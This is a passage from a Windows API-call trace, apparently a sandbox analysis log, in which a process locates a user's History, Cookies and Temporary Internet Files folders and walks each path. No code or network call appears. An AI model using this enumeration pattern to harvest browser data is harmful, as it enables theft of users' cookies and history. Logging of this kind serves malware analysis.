len=0x3a | out: pbstr=0x28fde8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0164.355] SysReAllocStringLen (in: pbstr=0x2b1007c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x2b1007c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0164.355] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0164.356] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", cchLength=0x3c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 0x3c [0164.356] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies", len=0x3c | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies") returned 1 [0164.356] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.356] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.357] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.357] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.357] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="roaming", len=0x7 | out: pbstr=0x2b100ec*="roaming") returned 1 [0164.358] SysReAllocStringLen (in: pbstr=0x2b100f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x2b100f8*="microsoft") returned 1 [0164.358] SysReAllocStringLen (in: pbstr=0x2b10128*=0x0, psz="windows", len=0x7 | out: pbstr=0x2b10128*="windows") returned 1 [0164.359] SysReAllocStringLen (in: pbstr=0x2b10134*=0x0, psz="cookies", len=0x7 | out: pbstr=0x2b10134*="cookies") returned 1 [0164.359] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.359] SysReAllocStringLen (in: pbstr=0x28fdd8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdd8*="c:\\") returned 1 [0164.359] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.360] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.360] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdd8*="c:\\Users\\") returned 1 [0164.360] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.360] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.360] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.360] GetLastError () returned 0x12 [0164.360] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.361] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.361] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.361] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.361] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108f2c0 [0164.361] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.361] GetLastError () returned 0x12 [0164.361] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.365] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.365] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0164.365] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0164.366] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x108f2c0 [0164.366] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0164.366] GetLastError () returned 0x12 [0164.366] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.366] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0164.367] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0164.367] SysReAllocStringLen (in: pbstr=0x28fae8*="roaming", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0164.367] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x108f2c0 [0164.367] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0164.367] GetLastError () returned 0x12 [0164.367] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.368] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", len=0x2c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft") returned 1 [0164.368] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", len=0x2d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\") returned 1 [0164.368] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0164.368] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x108f2c0 [0164.368] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0164.368] GetLastError () returned 0x12 [0164.368] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.369] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", len=0x34 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows") returned 1 [0164.369] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", len=0x35 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\") returned 1 [0164.369] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="cookies", len=0x7 | out: pbstr=0x28fae8*="cookies") returned 1 [0164.369] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\cookies" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0x108f2c0 [0164.369] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0 [0164.369] GetLastError () returned 0x12 [0164.370] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.370] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0164.370] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0164.372] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0164.372] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0164.372] SysReAllocStringLen (in: pbstr=0x28fddc*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fddc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0164.372] SysReAllocStringLen (in: pbstr=0x2b10080*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x2b10080*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0164.373] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0164.373] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", cchLength=0x4b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 0x4b [0164.373] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files", len=0x4b | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 1 [0164.374] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.374] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.375] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.375] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.375] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="local", len=0x5 | out: pbstr=0x2b100ec*="local") returned 1 [0164.375] SysReAllocStringLen (in: pbstr=0x2b100f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x2b100f8*="microsoft") returned 1 [0164.376] SysReAllocStringLen (in: pbstr=0x2b10128*=0x0, psz="windows", len=0x7 | out: pbstr=0x2b10128*="windows") returned 1 [0164.377] SysReAllocStringLen (in: pbstr=0x2b10134*=0x0, psz="temporary internet files", len=0x18 | out: pbstr=0x2b10134*="temporary internet files") returned 1 [0164.377] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.381] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdcc*="c:\\") returned 1 [0164.381] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.381] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.382] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.382] GetLastError () returned 0x12 [0164.382] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.382] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.382] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdcc*="c:\\Users\\") returned 1 [0164.382] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.383] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.383] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.383] GetLastError () returned 0x12 [0164.383] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.384] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.384] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.384] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.384] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108f2c0 [0164.384] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.384] GetLastError () returned 0x12 [0164.384] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.385] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.385] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x108f2c0 [0164.386] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0164.386] GetLastError () returned 0x12 [0164.386] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.387] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x108f2c0 [0164.387] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0164.387] GetLastError () returned 0x12 [0164.387] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.388] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, 